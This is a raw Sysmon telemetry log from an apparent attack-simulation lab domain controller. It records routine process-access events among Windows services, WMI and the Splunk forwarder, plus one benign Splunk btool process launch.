13:34:16.689{59A5CD1D-8E56-6005-2F00-00000000A301}22762616C:\Windows\system32\DFSRs.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d847d|C:\Windows\system32\DFSRs.exe+c3ca|C:\Windows\system32\DFSRs.exe+51c1|C:\Windows\system32\DFSRs.exe+73b2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.673{59A5CD1D-8E56-6005-2F00-00000000A301}22762616C:\Windows\system32\DFSRs.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d847d|C:\Windows\system32\DFSRs.exe+c1bd|C:\Windows\system32\DFSRs.exe+51c1|C:\Windows\system32\DFSRs.exe+73b2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.611{59A5CD1D-8E58-6005-4000-00000000A301}37843812C:\Windows\system32\wbem\wmiprvse.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\combase.dll+a8a02|C:\Windows\System32\combase.dll+a972e|C:\Windows\System32\combase.dll+a953f|C:\Windows\System32\combase.dll+45458|C:\Windows\System32\combase.dll+45070|C:\Windows\System32\combase.dll+520a7|C:\Windows\System32\combase.dll+c2274|C:\Windows\System32\combase.dll+4f0e1|C:\Windows\System32\combase.dll+508c0|C:\Windows\System32\combase.dll+21ba|C:\Windows\System32\RPCRT4.dll+d97da|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-4300-00000000A301}3860C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4300-00000000A301}3860C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E58-6005-4200-00000000A301}38403844C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E58-6005-4300-00000000A301}3860C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.508{59A5CD1D-8E58-6005-4300-00000000A301}3860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E58-6005-4200-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000001765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-4200-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 